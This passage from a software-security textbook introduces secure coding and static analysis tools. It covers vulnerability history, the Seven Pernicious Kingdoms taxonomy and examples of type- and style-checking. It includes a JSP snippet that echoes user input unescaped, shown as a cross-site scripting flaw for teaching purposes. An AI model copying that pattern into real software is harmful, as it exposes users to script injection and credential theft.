      } else {
        fprintf(file, "%.128s", msg);
      }
    }

In considering the range of things that might go wrong with a piece of code, programmers tend to stick with their experience: The program might crash, it might loop forever, or it might simply fail to produce the desired result. All of these failure modes are important, but preventing them does not lead to software that stands up to attack. Historically, programmers have not been trained to consider the interests or capabilities of an adversary. This results in code that might be well defended against the types of problems that a programmer is familiar with but that is still easy for an attacker to subvert.
1.2 Security Features != Secure Features

Sometimes programmers do think about security, but more often than not, they think in terms of security features such as cryptographic ciphers, passwords, and access control mechanisms. As Michael Howard, a program manager on the Microsoft Security Engineering Team, says, “Security features != Secure features” [Howard and LeBlanc, 2002]. For a program to be secure, all portions of the program must be secure, not just the bits that explicitly address security. In many cases, security failings are not related to security features at all. A security feature can fail and jeopardize system security in plenty of ways, but there are usually many more ways in which defective nonsecurity features can go wrong and lead to a security problem.

Security features are (usually) implemented with the idea that they must function correctly to maintain system security, but nonsecurity features often fail to receive this same consideration, even though they are often just as critical to the system's security. Programmers get this wrong all the time; as a consequence, they stop thinking about security when they need to be focusing on it. Consider this misguided quote from BEA’s documentation for WebLogic [BEA, 2004]:

    Since most security for Web applications can be implemented by a system administrator, application developers need not pay attention to the details of securing the application unless there are special considerations that must be addressed in the code. For programming custom security into an application, WebLogic Server application developers can take advantage of BEA-supplied Application Programming Interfaces (APIs) for obtaining information about subjects and principals (identifying information for users) that are used by WebLogic Server. The APIs are found in the package.

Imagine a burglar who wants to break into your house.
He might start by walking up to the front door and trying to turn the doorknob. If the door is locked, he has run into a security feature. Now imagine that the door’s hinges are on the outside of the house. The builder probably didn’t think about the hinge in relation to security. The hinges are by no means a security feature; they are present so that the door will meet the “easy to open and close” requirement. But now it’s unlikely that our burglar will spend time trying to pick the lock or pry open the door. He’ll simply lift out the hinge bolts and remove the door. Home builders stopped making this mistake long ago, but in the world of software security, this sort of goof-up still happens on a remarkably regular basis.

Consider the list of high-profile vulnerabilities in image display software over the last five years, shown in Table 1.1. In all cases, the code that contained the vulnerability was related to image processing, not to security, but the effects of these vulnerabilities range from denial of service to complete system compromise.

Table 1.1 Vulnerabilities in image display code over the last five years. All are significant vulnerabilities. None have anything to do with security features.

Date | Program | Effect | Reference
March 2002 | zLib | Denial of service affecting many programs, including those that display or manipulate PNG files. | bid/6431
November 2002 | Internet Explorer | Malicious PNG file can be used to execute arbitrary code when displayed in Internet Explorer. | technet/security/bulletin/MS02-066.mspx
August 2004 | libPNG | Denial of service affecting users of Firefox, Opera, Safari, and many other programs. | bid/6431
September 2004 | MS GDI+ | JPG-rendering code that enables the remote execution of arbitrary code. Affects Internet Explorer, Microsoft Office, and other Microsoft products. | technet/security/bulletin/MS04-028.mspx
July 2005 | zLib | Creates the potential for remote code execution. Affects many programs, including those that display or manipulate PNG files. | bid/14162
December 2005 | Windows Graphics Rendering Engine | Rendering of WMF files enables remote code execution of arbitrary code. Exploitable through Internet Explorer. | technet/security/bulletin/ms06-001.mspx
January 2007 | Java 2 Platform | Rendering of GIF image allows the remote execution of arbitrary code through a hostile applet. | search/1-26-102760-1

Instead of discussing ways to implement security features or make use of prepackaged security modules or frameworks, we concentrate on identifying and avoiding common mistakes in code that are not necessarily related to any security feature. We occasionally discuss security features, but only in the context of common implementation errors.

1.3 The Quality Fallacy

Anyone who has ever written a program knows that mistakes are inevitable. Anyone who writes software professionally knows that producing good software requires a systematic approach to finding bugs. By far the most widely used approach to bug finding is dynamic testing, which involves running the software and comparing its output against an expected result. Advocates of extreme programming want to see a lot of small tests (unit tests) written by the programmer even before the code is written. Large software organizations have big groups of dedicated QA engineers who are responsible for nothing other than writing tests, running tests, and evaluating test results.

If you’ve always thought of security as just another facet of software quality, you might be surprised to learn that it is almost impossible to improve software security merely by improving quality assurance. In practice, most software quality efforts are geared toward testing program functionality. The purpose is to find the bugs that will affect the most users in the worst ways.
Functionality testing works well for making sure that typical users with typical needs will be happy, but it just won’t work for finding security defects that aren’t related to security features. Most software testing is aimed at comparing the implementation to the requirements, and this approach is inadequate for finding security problems.

The software (the implementation) has a list of things it’s supposed to do (the requirements). Imagine testing a piece of software by running down the list of requirements and making sure the implementation fulfills each one. If the software fails to meet a particular requirement, you’ve found a bug. This works well for testing software functionality, even security functionality, but it will miss many security problems because security problems are often not violations of the requirements. Instead, security problems are frequently “unintended functionality” that causes the program to be insecure. Whittaker and Thompson describe it with the diagram in Figure 1.1 [Whittaker and Thompson, 2003].

Figure 1.1 Testing to make sure that the implementation includes the features described in the specification will miss many security problems. (Diagram labels: Requirements, Implementation, bugs, security problems.)

Ivan Arce, CTO of Core Security Technologies, put it like this:

    Reliable software does what it is supposed to do. Secure software does what it is supposed to do, and nothing else.

The following JSP fragment demonstrates this phenomenon. (This bit of code is from Foundations of AJAX [Asleson and Schutta, 2005].) The code accepts an HTTP parameter and echoes it back to the browser.

    Hello ${}!

This code might meet the program’s requirements, but it also enables a cross-site scripting attack because it will echo any string back to the browser, including a script written by an attacker.
Because of this weakness, unsuspecting victims could click on a malicious link in an email message and subsequently give up their authentication credentials to an attacker. (See Chapter 9, “Web Applications,” for a complete discussion of cross-site scripting.) No amount of testing the intended functionality will reveal this problem.

A growing number of organizations attempt to overcome the lack of focus on security by mandating a penetration test. After a system is built, testers stage a mock attack on the system. A black-box test gives the attackers no information about how the system is constructed. This might sound like a realistic scenario, but in reality, it is both inadequate and inefficient. Testing cannot begin until the system is complete, and testers have exclusive access to the software only until the release date. After the release, attackers and defenders are on equal footing; attackers are now able to test and study the software, too. The narrow window means that the sum total of all attackers can easily have more hours to spend hunting for problems than the defenders have hours for testing. The testers eventually move on to other tasks, but attackers get to keep on trying. The end result of their greater investment is that attackers can find a greater number of vulnerabilities.

Black-box testing tools try to automate some of the techniques applied by penetration testers by using precanned attacks. Because these tools use close to the same set of attacks against every program, they are able to find only defects that do not require much meaningful interaction with the software being tested. Failing such a test is a sign of real trouble, but passing doesn’t mean very much; it’s easy to pass a set of precanned tests.

Another approach to testing, fuzzing, involves feeding the program randomly generated input [Miller, 2007].
Testing with purely random input tends to trigger the same conditions in the program again and again, which is inefficient. To improve efficiency, a fuzzer should skew the tests it generates based on knowledge about the program under test. If the fuzzer generates tests that resemble the file formats, protocols, or conventions used by the target program, it is more likely to put the program through its paces. Even with customization, fuzzing is a time-consuming process, and without proper iteration and refinement, the fuzzer is likely to spend most of its time exploring a shallow portion of the program’s state space.

1.4 Static Analysis in the Big Picture

Most software development methodologies can be cast into some arrangement of the same four steps:

1. Plan: Gather requirements, create a design, and plan testing.
2. Build: Write the code and the tests.
3. Test: Run tests, record results, and determine the quality of the code.
4. Field: Deploy the software, monitor its performance, and maintain it as necessary.

Different methodologies place a different amount of emphasis on each step, sometimes iterating through many cycles of a few steps or shrinking steps as a project matures, but all commonly practiced methodologies, including the waterfall model, the spiral model, extreme programming, and the Rational Unified Process, can be described in this four-step context.

No matter what methodology is used, the only way to get security right is to incorporate security considerations into all the steps. Historically, the symptoms of bad software security have been treated as a field problem to be solved with firewalls, application firewalls, intrusion detection systems, and penetration testing. Figure 1.2 illustrates this late-in-the-game approach. The problem is, it doesn’t work. Instead, it creates a never-ending series of snafus and finger pointing.
The right answer, illustrated in Figure 1.3, is to focus efforts on the cause of most software security problems: the way the software is constructed. Security needs to be an integral part of the way software is planned and built. (It should continue to be part of testing and fielding software, too, but with a diminished emphasis.)

Figure 1.2 Treating the symptom: Focusing on security after the software is built is the wrong thing to do. (Diagram labels: Plan, Build, Test, Field; Firewalls, Intrusion Detection Systems, Penetration Testing.)

Figure 1.3 Treating the cause: Focusing on security early, with activities centered on the way the software is built. (Diagram labels: Plan, Build, Test, Field; Static Source Code Analysis, Architectural Risk Assessment, Security Requirements.)

Gary McGraw estimates that roughly half of the mistakes that lead to security problems are implementation oversights, omissions, or misunderstandings [McGraw, 2006]. The format string and cross-site scripting problems we’ve already looked at both fall into this category. These are exactly the kinds of problems that a code review is good at flushing out. The downside is that, to find security problems during a code review, you have to be able to identify a security problem when you see one, and security mistakes can be subtle and easy to overlook even when you’re staring at them in the source code. This is where static analysis tools really shine. A static analysis tool can make the code review process faster and more fruitful by hypothesizing a set of potential problems for consideration during a code review.

If half of security problems stem from the way the program is implemented, the other half are built into the design. The purpose of an architectural risk analysis is to make sure that, from a high level, the system is not designed in a manner that makes it inherently insecure. Design problems can be difficult or impossible to spot by looking at code.
Instead, you need to examine the specification and design documents to find inconsistencies, bad assumptions, and other problems that could compromise security. For the most part, architectural risk analysis is a manual inspection process.

Architectural risk analysis is useful not only for identifying design-level defects, but also for identifying and prioritizing the kinds of issues that need to be considered during code review. A program that is secure in one context might not be secure in another, so establishing the correct context for code review is important. For example, a program that is acceptable for a normal user could be a major security problem if run with administrator privileges. If a review of the design indicates that the program requires special privileges to run, the code review can look for ways in which those special privileges might be abused or misappropriated.

In his book Software Security, McGraw lays out a set of seven touchpoints for integrating software security into software development [McGraw, 2006]. Code review with a tool is touchpoint number one. Michael Howard and Steve Lipner describe Microsoft’s security practices in their book The Security Development Lifecycle [Howard and Lipner, 2006]. Like McGraw, they advocate the use of tools for analyzing source code. Similarly, the CLASP Application Security Process calls for performing a source-level security review using automated analysis tools [CLASP, 2005]. No one claims that source code review is capable of identifying all problems, but the consensus is that source code review has a major part to play in any software security process.

1.5 Classifying Vulnerabilities

In the course of our work, we look at a lot of vulnerable code. It is impossible to study vulnerabilities for very long without beginning to pick out patterns and relationships between the different types of mistakes that programmers make.
From a high level, we divide defects into two loose groups: generic and context specific. A generic defect is a problem that can occur in almost any program written in the given language. A buffer overflow is an excellent example of a generic defect for C and C++ programs: A buffer overflow represents a security problem in almost any context, and many of the functions and code constructs that can lead to a buffer overflow are the same, regardless of the purpose of the program. (Chapter 6, “Buffer Overflow,” and Chapter 7, “Bride of Buffer Overflow,” discuss buffer overflow defects in detail.)

Finding context-specific defects, on the other hand, requires specific knowledge about the semantics of the program at hand. Imagine a program that handles credit card numbers. To comply with the Payment Card Industry (PCI) Data Security Standard, a program should never display a complete credit card number back to the user. Because there are no standard functions or data structures for storing or presenting credit card data, every program has its own way of doing things. Therefore, finding a problem with the credit card handling requires understanding the meaning of the functions and data structures defined by the program.

In addition to the amount of context required to identify a defect, many defects can be found only in a particular representation of the program. Figure 1.4 examines the matrix formed by defect type and defect visibility. High-level problems such as wholesale granting of trust are often visible only in the program’s design, while implementation errors such as omitting input validation can often be found only by examining the program’s source code. Object-oriented languages such as Java have large class libraries, which make it possible to more easily understand the design by examining the source code.
Classes derived from a standard library carry significant semantics with them, but even in the best of cases, it is not easy (or desirable) to reverse-engineer the design from the implementation.

Figure 1.4 The best way to find a particular defect depends on whether it is generic or context specific, and whether it is visible in the code or only in the design.

  Generic defects, visible in the code: Static analysis sweet spot. Built-in rules make it easy for tools to find these without programmer guidance. Example: buffer overflow.
  Generic defects, visible only in the design: Most likely to be found through architectural analysis. Example: the program executes code downloaded as an email attachment.
  Context-specific defects, visible in the code: Possible to find with static analysis, but customization may be required. Example: mishandling of credit card information.
  Context-specific defects, visible only in the design: Requires both understanding of general security principles along with domain-specific expertise. Example: cryptographic keys kept in use for an unsafe duration.

Security defects share enough common themes and patterns that it makes sense to define a nomenclature for describing them. People have been creating classification systems for security defects since at least the 1970s, but older classification efforts often fail to capture the salient relationships we see today. Over the last few years, we have seen a renewed interest in this area. The Common Weakness Enumeration (CWE) project is building a formal list and a classification scheme for software weaknesses. The OWASP Honeycomb project is using a community-based approach to define terms and relationships between security principles, threats, attacks, vulnerabilities, and countermeasures. We prefer a simple organization that gives us just enough vocabulary to talk to programmers about the kinds of coding errors that are likely to lead to security problems.

The Seven Pernicious Kingdoms

Throughout the book, we refer to the Seven Pernicious Kingdoms, a taxonomy created by Tsipenyuk, Chess, and McGraw [Tsipenyuk, Chess, McGraw, 2005]. The term kingdom is used as biologists use it in their taxonomy of living organisms: to indicate a high-level grouping of similar members. The Seven Pernicious Kingdoms are listed here:

  1. Input Validation and Representation
  2. API Abuse
  3. Security Features
  4. Time and State
  5. Error Handling
  6. Code Quality
  7. Encapsulation
  * Environment

(Note that there are actually eight kingdoms, with the eighth referring to the influence of outside factors, such as the environment, on the code.)

In our experience, this classification works well for describing both generic defects and context-specific defects. The ordering of kingdoms gives an estimate of their relative importance. McGraw discusses the Seven Pernicious Kingdoms in detail in Software Security [McGraw, 2006], and the complete taxonomy is available on the Web; we include a brief overview here to lay out the terminology we use throughout the book.

1. Input Validation and Representation

Input validation and representation problems are caused by metacharacters, alternate encodings, and numeric representations. Security problems result from trusting input. The issues include buffer overflow, cross-site scripting, SQL injection, and many others. Problems related to input validation and representation are the most prevalent and the most dangerous category of security defects in software today. As a consequence, Chapter 5, “Handling Input,” is dedicated solely to matters of handling input, and input validation and representation play a significant role in the discussion of buffer overflow (Chapters 6 and 7), the Web (Chapter 9), and XML and Web Services (Chapter 10, “XML and Web Services”).

2. API Abuse

An API is a contract between a caller and a callee.
The most common forms of API abuse are caused by the caller failing to honor its end of this contract. For example, if a program fails to call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. We discuss this and other APIs related to privilege management in Chapter 12, “Privileged Programs.” Another example of abuse is relying upon a DNS lookup function to return reliable identity information. In this case, the caller abuses the callee API by making an assumption about its behavior (that the return value can be used for authentication purposes). See Chapter 5 for more.

The caller-callee contract can also be violated from the other side. For example, if a Java class extends java.util.Random and returns nonrandom values, the contract is violated. (We discuss random numbers in Chapter 11, “Privacy and Secrets.”)

3. Security Features

Even though software security is much more than just security features, it’s important to get the security features right. Here we’re concerned with topics such as authentication, access control, confidentiality, cryptography, and privilege management. Hard-coding a database password in source code is an example of a security feature (authentication) gone wrong. We look at problems related to managing these kinds of passwords in Chapter 11. Leaking confidential data between system users is another example (also discussed in Chapter 11). The topic of writing privileged programs gets a chapter of its own (Chapter 12).

4. Time and State

To maintain their sanity, programmers like to think of their code as being executed in an orderly, uninterrupted, and linear fashion. Multitasking operating systems running on multicore, multi-CPU, or distributed machines don’t play by these rules: they juggle multiple users and multiple threads of control.
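
A minimal Java sketch can make this mismatch concrete. It is not taken from the book: the class name GoldLedger and its methods are hypothetical, and the code assumes Java 8 or later. Several threads deposit into a shared counter through an unprotected read-modify-write and, for comparison, through an atomic increment. On a multicore machine the unprotected total will often come out lower than expected because concurrent deposits overwrite one another.

```java
import java.util.concurrent.atomic.AtomicInteger;

// Hypothetical illustration: GoldLedger is not an API from the book.
final class GoldLedger {
    private int unsafeGold = 0;                                  // shared state, unprotected
    private final AtomicInteger safeGold = new AtomicInteger();  // shared state, atomic

    // Read, add, and write back as separate steps: two threads can read the
    // same value and both store value + 1, so one deposit is lost.
    void depositUnsafe() { unsafeGold = unsafeGold + 1; }

    // A single atomic increment: no deposit can be lost.
    void depositSafe() { safeGold.incrementAndGet(); }

    // Starts the given number of threads, each making depositsPerThread
    // deposits through both paths. Returns { unsafe total, safe total }.
    static int[] run(int threads, int depositsPerThread) {
        GoldLedger ledger = new GoldLedger();
        Thread[] workers = new Thread[threads];
        for (int t = 0; t < threads; t++) {
            workers[t] = new Thread(() -> {
                for (int i = 0; i < depositsPerThread; i++) {
                    ledger.depositUnsafe();
                    ledger.depositSafe();
                }
            });
            workers[t].start();
        }
        for (Thread w : workers) {
            try {
                w.join(); // after join, this thread sees the worker's writes
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                throw new IllegalStateException("interrupted while waiting", e);
            }
        }
        return new int[] { ledger.unsafeGold, ledger.safeGold.get() };
    }

    public static void main(String[] args) {
        int[] totals = run(4, 100_000);
        System.out.println("expected: " + (4 * 100_000));
        System.out.println("unsafe:   " + totals[0]); // varies from run to run
        System.out.println("safe:     " + totals[1]);
    }
}
```

The unsafe total is not predictable, which is the point: the code looks linear to the programmer, but the scheduler is free to interleave the steps.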
Defects rush to fill the gap between the programmer’s model of how a program executes and what happens in reality. These defects are caused by unexpected interactions between threads, processes, time, and data. These interactions happen through shared state: semaphores, variables, the file system, and anything that can store information.

Massively multiplayer online role-playing games (MMORPGs) such as World of Warcraft often contain time and state vulnerabilities because they allow hundreds or thousands of distributed users to interact simultaneously [Hoglund and McGraw, 2007]. The lag time between an event and the bookkeeping for the event sometimes leaves room for cheaters to duplicate gold pieces, cheat death, or otherwise gain an unfair advantage.

Time and state is a topic throughout the book. For example, Chapter 5 points out that interrupts are input too, and Chapter 11 looks at race conditions in Java Servlets.

5. Error Handling

Errors and error handling represent a class of API, but problems related to error handling are so common that they deserve a kingdom of their own. As with API abuse, there are two ways to introduce an error-related security vulnerability. The first (and most common) is to handle errors poorly or not at all. The second is to produce errors that either reveal too much or are difficult to handle safely. Chapter 8, “Errors and Exceptions,” focuses on the way error handling mishaps create ideal conditions for security problems.

6. Code Quality

Poor code quality leads to unpredictable behavior. From a user’s perspective, this often manifests itself as poor usability. For an attacker, it provides an opportunity to stress the system in unexpected ways. Dereferencing a null pointer or entering an infinite loop could enable a denial-of-service attack, but it could also create the conditions necessary for an attacker to take advantage of some poorly thought-out error handling code.
Good software security and good code quality are inextricably intertwined.

7. Encapsulation

Encapsulation is about drawing strong boundaries. In a Web browser, that might mean ensuring that your mobile code cannot be abused by other mobile code. On the server, it might mean differentiation between validated data and unvalidated data (see the discussion of trust boundaries in Chapter 5), between one user’s data and another’s (privacy, discussed in Chapter 11), or between data that users are allowed to see and data that they are not (privilege, discussed in Chapter 12).

* Environment

This kingdom includes everything that is outside the source code but is still critical to the security of the product being created. Because the issues covered by this kingdom are not directly related to source code, we have separated it from the rest of the kingdoms. The configuration files that govern the program’s behavior and the compiler flags used to build the program are two examples of the environment influencing software security. Configuration comes up in our discussion of Web applications (Chapter 9) and Web Services (Chapter 10).

The Seven Pernicious Kingdoms vs. The OWASP Top 10

Table 1.2 shows the relationship between the Seven Pernicious Kingdoms and a popular list of vulnerabilities: the OWASP Top 10 [OWASP, 2004]. The Seven Pernicious Kingdoms encompass everything included in the OWASP Top 10, and the ranking of the OWASP categories largely follows the ordering of the Seven Kingdoms.

Table 1.2 The Seven Pernicious Kingdoms in relation to the OWASP Top 10.

  Seven Pernicious Kingdoms                  OWASP Top 10
  1. Input Validation and Representation     1. Unvalidated Input
                                             4. Cross-Site Scripting (XSS) Flaws
                                             5. Buffer Overflows
                                             6. Injection Flaws
  2. API Abuse
  3. Security Features                       2. Broken Access Control
                                             3. Broken Authentication and Session Management
                                             8. Insecure Storage
  4. Time and State
  5. Error Handling                          7. Improper Error Handling
  6. Code Quality                            9. Denial of Service
  7. Encapsulation
  * Environment                              10. Insecure Configuration Management

1.6 Summary

Getting security right requires understanding what can go wrong. By looking at a multitude of past security problems, we know that small coding errors can have a big impact on security. Often these problems are not related to any security feature, and there is no way to solve them by adding or altering security features. Techniques such as defensive programming that are aimed at creating more reliable software don’t solve the security problem, and neither does more extensive software testing or penetration testing.

Achieving good software security requires taking security into account throughout the software development lifecycle. Different security methodologies emphasize different process steps, but all methodologies agree on one point: Developers need to examine source code to identify security-relevant defects. Static analysis can help identify problems that are visible in the code. Although just about any variety of mistake has the theoretical potential to cause a security problem, the kinds of errors that really do lead to security problems cluster around a small number of subjects. We refer to these subjects as the Seven Pernicious Kingdoms. We use terminology from the Seven Pernicious Kingdoms throughout the book to describe errors that lead to security problems.

2 Introduction to Static Analysis

The refinement of techniques for the prompt discovery of error serves as well as any other as a hallmark of what we mean by science.
J. Robert Oppenheimer

This chapter is about static analysis tools: what they are, what they’re good for, and what their limitations are. Any tool that analyzes code without executing it is performing static analysis.
For the purpose of detecting security problems, the variety of static analysis tools we are most interested in are the ones that behave a bit like a spell checker; they prevent well-understood varieties of mistakes from going unnoticed. Even good spellers use a spell checker because, invariably, spelling mistakes creep in no matter how good a speller you are. A spell checker won’t catch every slip-up: If you type mute when you mean moot, a spell checker won’t help. Static analysis tools are the same way. A clean run doesn’t guarantee that your code is perfect; it merely indicates that it is free of certain kinds of common problems. Most practiced and professional writers find a spell checker to be a useful tool. Poor writers benefit from using a spell checker too, but the tool does not transform them into excellent writers! The same goes for static analysis: Good programmers can leverage static analysis tools to excellent effect, but bad programmers will still produce bad programs regardless of the tools they use.

Our focus is on static analysis tools that identify security defects, but we begin by looking at the range of problems that static analysis can help solve. Later in the chapter, we look at the fundamental problems that make static analysis difficult from both a theoretical standpoint and a practical standpoint, and explore the trade-offs that tools make to meet their objectives.

2.1 Capabilities and Limitations of Static Analysis

Security problems can result from the same kind of simple mistakes that lead a good speller to occasionally make a typo: a little bit of confusion, a momentary lapse, or a temporary disconnect between the brain and the keyboard. But security problems can also grow out of a lack of understanding about what secure programming entails. It is not unusual for programmers to be completely unaware of some of the ways that attackers will try to take advantage of a piece of code.
With that in mind, static analysis is well suited to identifying security problems for a number of reasons:

• Static analysis tools apply checks thoroughly and consistently, without any of the bias that a programmer might have about which pieces of code are “interesting” from a security perspective or which pieces of code are easy to exercise through dynamic testing. Ever asked someone to proofread your work and had them point out an obvious problem that you completely overlooked? Was your brain automatically translating the words on the page into the words you intended to write? Then you know how valuable an unbiased analysis can be.

• By examining the code itself, static analysis tools can often point to the root cause of a security problem, not just one of its symptoms. This is particularly important for making sure that vulnerabilities are fixed properly. More than once, we’ve heard the story where the security team reports: “The program contains a buffer overflow. We know it contains a buffer overflow because when we feed it the letter a 50 times in a row, it crashes.” Only later does the security team find out that the program has been fixed by checking to see if the input consists of exactly the letter a 50 times in a row.

• Static analysis can find errors early in development, even before the program is run for the first time. Finding an error early not only reduces the cost of fixing the error, but the quick feedback cycle can help guide a programmer’s work: A programmer has the opportunity to correct mistakes he or she wasn’t previously aware could even happen. The attack scenarios and information about code constructs used by a static analysis tool act as a means of knowledge transfer.

• When a security researcher discovers a new variety of attack, static analysis tools make it easy to recheck a large body of code to see where the new attack might succeed.
Some security defects exist in software for years before they are discovered, which makes the ability to review legacy code for newly discovered types of defects invaluable.

The most common complaint leveled against static analysis tools that target security is that they produce too much noise. Specifically, they produce too many false positives, also known as false alarms. In this context, a false positive is a problem reported in a program when no problem actually exists. A large number of false positives can cause real difficulties. Not only does wading through a long list of false positives feel a little like serving latrine duty, but a programmer who has to look through a long list of false positives might overlook important results that are buried in the list.

False positives are certainly undesirable, but from a security perspective, false negatives are much worse. With a false negative, a problem exists in the program, but the tool does not report it. The penalty for a false positive is the amount of time wasted while reviewing the result. The penalty for a false negative is far greater. Not only do you pay the price associated with having a vulnerability in your code, but you live with a false sense of security stemming from the fact that the tool made it appear that everything was okay.

All static analysis tools are guaranteed to produce some false positives or some false negatives. Most produce both. We discuss the reasons why later in this chapter. The balance a tool strikes between false positives and false negatives is often indicative of the purpose of the tool. The right balance is quite different for static analysis tools that are meant to detect garden-variety bugs and static analysis tools that specifically target security-relevant defects. The cost of missing a garden-variety bug is, relatively speaking, small: multiple techniques and processes can be applied to make sure that the most important bugs are caught.
For this reason, code quality tools usually attempt to produce a low number of false positives and are more willing to accept false negatives. Security is a different story. The penalty for overlooked security bugs is high, so security tools usually produce more false positives to minimize false negatives.

For a static analysis tool to catch a defect, the defect must be visible in the code. This might seem like an obvious point, but it is important to understand that architectural risk analysis is a necessary complement to static analysis. Although some elements of a design have an explicit representation in the program (a hard-coded protocol identifier, for example), in many cases, it is hard to derive the design given only the implementation.

2.2 Solving Problems with Static Analysis

Static analysis is used more widely than many people realize, partially because there are many kinds of static analysis tools, each with different goals. In this section, we take a look at some of the different categories of static analysis tools, referring to commercial vendors and open source projects where appropriate, and show where security tools fit in. We cover:

• Type checking
• Style checking
• Program understanding
• Program verification
• Property checking
• Bug finding
• Security review

Type Checking

The most widely used form of static analysis, and the one that most programmers are familiar with, is type checking. Many programmers don’t give type checking much thought. After all, the rules of the game are typically defined by the programming language and enforced by the compiler, so a programmer gets little say in when the analysis is performed or how the analysis works. Type checking is static analysis nonetheless. Type checking eliminates entire categories of programming mistakes. For example, it prevents programmers from accidentally assigning integral values to object variables.
By catching errors at compile time, type checking prevents runtime errors.

Type checking is limited in its capacity to catch errors, though, and it suffers from false positives and false negatives just like all other static analysis techniques. Interestingly, programmers rarely complain about a type checker’s imperfections. The Java statements in Example 2.1 will not compile because Java does not allow a non-constant expression of type int to be assigned to a variable of type short without an explicit cast, even though the programmer’s intent is unambiguous. Example 2.2 shows the output from the Java compiler. This is an example of a type-checking false positive. The problem can be fixed by introducing an explicit type cast, which is the programmer’s way of overriding the default type-checking behavior.

Example 2.1 A type-checking false positive: These Java statements do not meet type safety rules even though they are logically correct.

    short s = 0;
    int i = s;    /* the type checker allows this */
    short r = i;  /* false positive: this will cause a
                     type checking error at compile time */

Example 2.2 Output from the Java compiler demonstrating the type-checking false positive.

    $ javac
    possible loss of precision
    found   : int
    required: short
    short r = i; /* false positive: this will cause a
              ^
    1 error

Type checking suffers from false negatives, too. The Java statements in Example 2.3 will pass type checking and compile without a hitch, but will fail at runtime. Arrays in Java are covariant, meaning that the type checker allows an Object array variable to hold a reference to a String array (because the String class is derived from the Object class), but at runtime Java will not allow the String array to hold a reference to an object of type Object. The type checker doesn’t complain about the code in Example 2.3, but when the code runs, it throws an ArrayStoreException. This represents a type-checking false negative.
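
Both behaviors can be observed in a small, self-contained program. The sketch below is an illustration rather than code from the book; the class name TypeCheckDemo and its methods are hypothetical. It applies the explicit cast that silences the false positive, shows why the checker is cautious about narrowing (an out-of-range int silently wraps when cast to short), and catches the ArrayStoreException produced by the covariant array assignment.

```java
// Hypothetical illustration: TypeCheckDemo is not part of the book's examples.
final class TypeCheckDemo {

    // The explicit cast overrides the type checker. The programmer now owns
    // the risk: values outside the range of short are silently truncated.
    static short narrow(int i) {
        return (short) i;
    }

    // Compiles cleanly because arrays are covariant, but the store is
    // rejected at runtime because the array really holds Strings.
    static boolean storeFails() {
        Object[] objs = new String[1];
        try {
            objs[0] = new Object();
            return false;
        } catch (ArrayStoreException e) {
            return true;
        }
    }

    public static void main(String[] args) {
        System.out.println(narrow(0));      // in range: value preserved
        System.out.println(narrow(70000));  // out of range: keeps only the low 16 bits
        System.out.println(storeFails());   // true: the runtime check fired
    }
}
```

The cast makes the first case compile, but it also shows what the compiler was guarding against: the check is a false positive only when the programmer knows the value fits.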

Example 2.3 These Java statements meet type-checking rules but will fail at runtime.

    Object[] objs = new String[1];
    objs[0] = new Object();

Style Checking

Style checkers are also static analysis tools. They generally enforce a pickier and more superficial set of rules than a type checker. Pure style checkers enforce rules related to whitespace, naming, deprecated functions, commenting, program structure, and the like. Because many programmers are fiercely attached to their own version of good style, most style checkers are quite flexible about the set of rules they enforce. The errors produced by style checkers often affect the readability and the maintainability of the code but do not indicate that a particular error will occur when the program runs.

Over time, some compilers have implemented optional style checks. For example, gcc’s -Wall flag will cause the compiler to detect when a switch statement does not account for all possible values of an enumerated type. Example 2.4 shows a C function with a suspicious switch statement. Example 2.5 shows what gcc says about the function when -Wall is in effect.

Example 2.4 A C function with a switch statement that does not account for all possible values of an enumerated type.

     1  typedef enum { red, green, blue } Color;
     2
     3  char* getColorString(Color c) {
     4    char* ret = NULL;
     5    switch (c) {
     6      case red:
     7        printf("red");
     8    }
     9    return ret;
    10  }

Example 2.5 The output from gcc using the -Wall flag.

    enum.c:5: warning: enumeration value 'green' not handled in switch
    enum.c:5: warning: enumeration value 'blue' not handled in switch

It can be difficult to adopt a style checker midway through a large programming project because different programmers likely have been adhering to somewhat different notions of the “correct” style.
After a project has begun, revisiting code purely to make adjustments to reduce output from the style checker yields only marginal benefit at the cost of great inconvenience. Going through a large body of code and correcting style-checker warnings is a little like painting a wooden house that’s infested by termites. Style checking is easiest to adopt at the outset of a project.

Many open source and commercial style checkers are available. By far the most famous is the venerable tool lint. Many of the checks originally performed by lint have been incorporated into the various warning levels offered by popular compilers, but the phrase lint-like has stuck around as a pejorative term for describing style checkers. For style checking Java, we like the open source program PMD because it makes it easy to choose the style rules you’d like to enforce and almost as easy to add your own rules. PMD also offers some rudimentary bug detection capability. Parasoft sells a combination bug finder/style checker for Java, C, and C++.

Program Understanding

Program understanding tools help users make sense of a large codebase. Integrated development environments (IDEs) always include at least some program understanding functionality. Simple examples include “find all uses of this method” and “find the declaration of this global variable.” More advanced analysis can support automatic program-refactoring features, such as renaming variables or splitting a single function into multiple functions.

Higher-level program understanding tools try to help programmers gain insight into the way a program works. Some try to reverse-engineer information about the design of the program based on an analysis of the implementation, thereby giving the programmer a big-picture view of the program.
This is particularly useful for programmers who need to make sense out of a large body of code that they did not write, but it is a poor substitute for the original design itself.

The open source Fujaba tool suite ( fujaba/), pictured in Figure 2.1, enables a developer to move back and forth between UML diagrams and Java source code. In some cases, Fujaba can also infer design patterns from the source code it reads. CAST Systems focuses on cataloging and exploring large software systems.

Figure 2.1 Fujaba enables programmers to move back and forth between a UML view and source code. Fujaba has a reverse-engineering capability that allows it to read source code and identify a limited set of design patterns.

Program Verification and Property Checking

A program verification tool accepts a specification and a body of code and then attempts to prove that the code is a faithful implementation of the specification. If the specification is a complete description of everything the program should do, the program verification tool can perform equivalence checking to make sure that the code and the specification exactly match.¹

¹ Equivalence checking is not used much for software, but in the world of hardware design, where a circuit might go through a long series of complex transformations on its way to becoming a piece of silicon, equivalence checking is widely used to make sure that a transformed design remains true to the original design.

Rarely do programmers have a specification that is detailed enough that it can be used for equivalence checking, and the job of creating such a specification can end up being more work than writing the code, so this style of formal verification does not happen very often. Even more limiting is the fact that, historically, equivalence checking tools have not been able to process programs of any significant size.
See the sidebar “Formal Verification and the Orange Book” for a 1980s attempt at pulling formal verification toward the mainstream.

